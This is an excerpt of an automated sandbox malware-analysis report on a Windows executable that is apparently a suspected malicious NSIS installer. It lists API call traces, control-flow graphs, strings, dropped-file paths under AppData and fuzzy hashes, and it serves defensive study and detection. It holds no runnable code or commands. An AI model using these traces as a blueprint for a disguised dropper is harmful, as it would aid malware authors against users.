                                                            • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 0040379B
                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882
                                                              • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                            • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                            • RegisterClassW.USER32(00433E40), ref: 00403984
                                                            • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 914957316-1842538388
                                                            • Opcode ID: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                            • Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
                                                            • Opcode Fuzzy Hash: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                            • Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D
                                                            Function 00402CFF Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 342 402cff-402d4d GetTickCount GetModuleFileNameW call 4059cf 345 402d59-402d87 call 405d46 call 4057fa call 405d46 GetFileSize 342->345 346 402d4f-402d54 342->346 354 402e74-402e82 call 402c9b 345->354 355 402d8d 345->355 347 402f31-402f35 346->347 361 402e84-402e87 354->361 362 402ed7-402edc 354->362 357 402d92-402da9 355->357 359 402dab 357->359 360 402dad-402daf call 403160 357->360 359->360 366 402db4-402db6 360->366 364 402e89-402e9a call 403192 call 403160 361->364 365 402eab-402ed5 GlobalAlloc call 403192 call 402f38 361->365 362->347 384 402e9f-402ea1 364->384 365->362 390 402ee8-402ef9 365->390 368 402dbc-402dc3 366->368 369 402ede-402ee6 call 402c9b 366->369 374 402dc5-402dd9 call 40598a 368->374 375 402e3f-402e43 368->375 369->362 380 402e4d-402e53 374->380 389 402ddb-402de2 374->389 379 402e45-402e4c call 402c9b 375->379 375->380 379->380 386 402e62-402e6c 380->386 387 402e55-402e5f call 40615e 380->387 384->362 392 402ea3-402ea9 384->392 386->357 391 402e72 386->391 387->386 389->380 395 402de4-402deb 389->395 396 402f01-402f06 390->396 397 402efb 390->397 391->354 392->362 392->365 395->380 398 402ded-402df4 395->398 399 402f07-402f0d 396->399 397->396 398->380 400 402df6-402dfd 398->400 399->399 401 402f0f-402f2a SetFilePointer call 40598a 399->401 400->380 402 402dff-402e1f 400->402 405 402f2f 401->405 402->362 404 402e25-402e29 402->404 406 402e31-402e39 404->406 407 402e2b-402e2f 404->407 405->347 406->380 408 402e3b-402e3d 406->408 407->391 407->406 408->380
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402D10
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\YrCSUX2O3I.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
                                                              • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                              • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\YrCSUX2O3I.exe,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\YrCSUX2O3I.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                            • API String ID: 4283519449-1153457532
                                                            • Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                            • Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
                                                            • Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                            • Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D
                                                            Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 540 401752-401777 call 402ad0 call 405825 545 401781-401793 call 405d46 call 4057ae lstrcatW 540->545 546 401779-40177f call 405d46 540->546 551 401798-401799 call 405fda 545->551 546->551 555 40179e-4017a2 551->555 556 4017a4-4017ae call 406089 555->556 557 4017d5-4017d8 555->557 565 4017c0-4017d2 556->565 566 4017b0-4017be CompareFileTime 556->566 558 4017e0-4017fc call 4059cf 557->558 559 4017da-4017db call 4059aa 557->559 567 401870-401899 call 404ffa call 402f38 558->567 568 4017fe-401801 558->568 559->558 565->557 566->565 582 4018a1-4018ad SetFileTime 567->582 583 40189b-40189f 567->583 569 401852-40185c call 404ffa 568->569 570 401803-401841 call 405d46 * 2 call 405d68 call 405d46 call 405529 568->570 580 401865-40186b 569->580 570->555 602 401847-401848 570->602 585 402966 580->585 584 4018b3-4018be CloseHandle 582->584 583->582 583->584 587 4018c4-4018c7 584->587 588 40295d-402960 584->588 590 402968-40296c 585->590 591 4018c9-4018da call 405d68 lstrcatW 587->591 592 4018dc-4018df call 405d68 587->592 588->585 598 4018e4-402241 call 405529 591->598 592->598 598->588 598->590 602->580 604 40184a-40184b 602->604 604->569
                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,?,00000031), ref: 00401793
                                                            • CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,?,00000031), ref: 004017B8
                                                              • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                              • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
                                                              • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens$Generic$Heteric
                                                            • API String ID: 1941528284-407415454
                                                            • Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                            • Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
                                                            • Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                            • Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D
                                                            Function 00402F38 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 606 402f38-402f51 607 402f53 606->607 608 402f5a-402f62 606->608 607->608 609 402f64 608->609 610 402f6b-402f70 608->610 609->610 611 402f80-402f8d call 403160 610->611 612 402f72-402f7b call 403192 610->612 616 402f93-402f97 611->616 617 40310d 611->617 612->611 618 4030f6-4030f8 616->618 619 402f9d-402fe4 GetTickCount 616->619 620 40310f-403110 617->620 621 4030fa-4030fd 618->621 622 40314c-40314f 618->622 623 403156 619->623 624 402fea-402ff2 619->624 625 403159-40315d 620->625 628 403102-40310b call 403160 621->628 629 4030ff 621->629 626 403151 622->626 627 403112-403118 622->627 623->625 630 402ff4 624->630 631 402ff7-403005 call 403160 624->631 626->623 634 40311a 627->634 635 40311d-40312b call 403160 627->635 628->617 641 403153 628->641 629->628 630->631 631->617 639 40300b-403014 631->639 634->635 635->617 643 40312d-40313f WriteFile 635->643 642 40301a-40303a call 4061cc 639->642 641->623 649 403040-403053 GetTickCount 642->649 650 4030ee-4030f0 642->650 645 403141-403144 643->645 646 4030f2-4030f4 643->646 645->646 648 403146-403149 645->648 646->620 648->622 651 403055-40305d 649->651 652 40309e-4030a2 649->652 650->620 653 403065-403096 MulDiv wsprintfW call 404ffa 651->653 654 40305f-403063 651->654 655 4030e3-4030e6 652->655 656 4030a4-4030a7 652->656 662 40309b 653->662 654->652 654->653 655->624 657 4030ec 655->657 659 4030c9-4030d4 656->659 660 4030a9-4030bd WriteFile 656->660 657->623 661 4030d7-4030db 659->661 660->646 663 4030bf-4030c2 660->663 661->642 664 4030e1 661->664 662->652 663->646 665 4030c4-4030c7 663->665 664->623 665->661
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402FA3
                                                            • GetTickCount.KERNEL32 ref: 00403048
                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                            • wsprintfW.USER32 ref: 00403084
                                                            • WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CountTick$FileWritewsprintf
                                                            • String ID: ... %d%%$znA
                                                            • API String ID: 4209647438-2447772013
                                                            • Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                            • Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
                                                            • Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                            • Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9
                                                            Function 00404FFA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 666 404ffa-40500f 667 405015-405026 666->667 668 4050c6-4050ca 666->668 669 405031-40503d lstrlenW 667->669 670 405028-40502c call 405d68 667->670 672 40505a-40505e 669->672 673 40503f-40504f lstrlenW 669->673 670->669 675 405060-405067 SetWindowTextW 672->675 676 40506d-405071 672->676 673->668 674 405051-405055 lstrcatW 673->674 674->672 675->676 677 405073-4050b5 SendMessageW * 3 676->677 678 4050b7-4050b9 676->678 677->678 678->668 679 4050bb-4050be 678->679 679->668
                                                            APIs
                                                            • lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                            • lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                            • lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
                                                            • SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Frisurens
                                                            • API String ID: 2531174081-3121014363
                                                            • Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                            • Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
                                                            • Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                            • Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98
                                                            Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 680 4015b9-4015cd call 402ad0 call 405859 685 401614-401617 680->685 686 4015cf-4015eb call 4057db CreateDirectoryW 680->686 687 401646-402195 call 401423 685->687 688 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 685->688 693 40160a-401612 686->693 694 4015ed-4015f8 GetLastError 686->694 702 402729-402730 687->702 703 40295d-40296c 687->703 688->703 704 40163e-401641 688->704 693->685 693->686 697 401607 694->697 698 4015fa-401605 GetFileAttributesW 694->698 697->693 698->693 698->697 702->703 704->703
                                                            APIs
                                                              • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,76F93420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 00405867
                                                              • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                              • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,00000000,000000F0), ref: 00401630
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens, xrefs: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                            • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens
                                                            • API String ID: 3751793516-1921291325
                                                            • Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                            • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                            • Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                            • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D
                                                            Function 00405C13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 707 405c13-405c45 RegOpenKeyExW 708 405c87-405c8a 707->708 709 405c47-405c66 RegQueryValueExW 707->709 710 405c74 709->710 711 405c68-405c6c 709->711 712 405c77-405c81 RegCloseKey 710->712 711->712 713 405c6e-405c72 711->713 712->708 713->710 713->712
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
                                                            • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
